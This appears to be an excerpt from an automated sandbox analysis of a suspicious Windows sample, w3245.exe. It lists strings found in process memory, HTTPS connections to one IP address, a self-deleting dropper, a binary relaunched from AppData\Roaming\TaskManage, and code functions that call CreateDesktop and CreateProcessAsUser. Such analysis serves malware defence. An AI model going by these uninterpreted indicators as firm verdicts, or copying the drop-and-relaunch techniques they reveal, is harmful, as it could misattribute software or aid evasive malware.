Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.6
Source: RescueCDBurner.exe, 00000002.00000002.1748933736.000000006C159000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1807317084.000000006B539000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: RescueCDBurner.exe, 00000002.00000002.1748933736.000000006C159000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000002.1807317084.000000006B539000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hk7Sh.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1lFz6G.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msOOW.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msOZ4.img
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msn.com
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 0000000D.00000003.2833316180.0000000007E9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50112 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50124 version: TLS 1.2
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB43C8C _CreateDesktop_@24,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,strcpy,strcpy,CreateDesktopA,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,GlobalFree,1_2_5BB43C8C
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3EEEA _CreateProcessAsUser_@44,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,memset,newMultiByteFromWideChar,CreateProcessAsUserA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,1_2_5BB3EEEA
Source: C:\Users\user\Desktop\w3245.exeFile deleted: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093001D0_2_0093001D
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009241EA0_2_009241EA
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009062AA0_2_009062AA
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009303D50_2_009303D5
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092C3320_2_0092C332
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093A5600_2_0093A560
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009307AA0_2_009307AA
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0090A8F10_2_0090A8F1
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093AA0E0_2_0093AA0E
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092FB890_2_0092FB89
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00930B6F0_2_00930B6F
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00932C180_2_00932C18
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00932E470_2_00932E47
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093EE7C0_2_0093EE7C
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB001D1_2_00CB001D
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CA41EA1_2_00CA41EA
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C862AA1_2_00C862AA
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB03D51_2_00CB03D5
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAC3321_2_00CAC332
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBA5601_2_00CBA560
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB07AA1_2_00CB07AA
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C8A8F11_2_00C8A8F1
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBAA0E1_2_00CBAA0E
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAFB891_2_00CAFB89
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB0B6F1_2_00CB0B6F
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB2C181_2_00CB2C18
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB2E471_2_00CB2E47
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBEE7C1_2_00CBEE7C
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB31FA01_2_5BB31FA0
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3FF2C1_2_5BB3FF2C
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BBE7BE02_2_6BBE7BE0
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BBE7AF02_2_6BBE7AF0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6AD492E03_2_6AD492E0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6AD497603_2_6AD49760
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E6B283_2_6B3E6B28
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4009193_2_6B400919
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B46083D3_2_6B46083D
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E8F833_2_6B3E8F83
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B41ECCD3_2_6B41ECCD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E43A63_2_6B3E43A6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42A3DD3_2_6B42A3DD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E63C93_2_6B3E63C9
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3EA2A73_2_6B3EA2A7
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4442FB3_2_6B4442FB
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4681403_2_6B468140
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3D21F03_2_6B3D21F0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E60183_2_6B3E6018
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42E0BD3_2_6B42E0BD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B44E7653_2_6B44E765
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B47672F3_2_6B47672F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E867F3_2_6B3E867F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F457E3_2_6B3F457E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B44245B3_2_6B44245B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42DBC03_2_6B42DBC0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B477A5A3_2_6B477A5A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E3A1C3_2_6B3E3A1C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B471A003_2_6B471A00
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4499453_2_6B449945
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B44F82E3_2_6B44F82E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4638883_2_6B463888
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E9D653_2_6B3E9D65
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E3DD03_2_6B3E3DD0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E5C303_2_6B3E5C30
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E5C2C3_2_6B3E5C2C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B461C173_2_6B461C17
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4433323_2_6B443332
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E72703_2_6B3E7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B47923E3_2_6B47923E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4452E53_2_6B4452E5
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F911E3_2_6B3F911E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E71A33_2_6B3E71A3
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E70933_2_6B3E7093
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E97A03_2_6B3E97A0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B44B79B3_2_6B44B79B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4796593_2_6B479659
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B46D6743_2_6B46D674
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42D6873_2_6B42D687
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B44D45A3_2_6B44D45A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4BF8623_2_6B4BF862
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4BE8223_2_6B4BE822
